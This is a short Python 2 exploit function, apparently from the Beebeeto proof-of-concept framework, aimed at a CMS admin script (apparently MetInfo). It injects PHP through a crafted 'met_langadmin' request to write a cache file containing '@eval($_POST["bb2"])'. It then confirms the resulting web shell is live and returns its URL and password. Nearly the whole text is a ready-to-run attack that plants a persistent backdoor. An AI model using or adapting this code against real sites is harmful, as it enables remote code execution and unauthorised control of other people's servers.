def exploit(cls, args):
url = args['options']['target']
payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//'
name = os.urandom(3).encode('hex')
shell_url = '%s/cache/langadmin_%s.php' % (url, name)
verify_url = (
'%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m'
'et_langadmin[%s][]=12345&str=%s' %
(url, name, name, urllib2.quote(payload))
)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
requests.get(verify_url)
if args['options']['verbose']:
print '[*] Request SHELL: ' + verify_url
content = requests.get(shell_url).content
if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['webshell'] = shell_url
args['poc_ret']['password'] = 'bb2'
return args
评论列表
文章目录
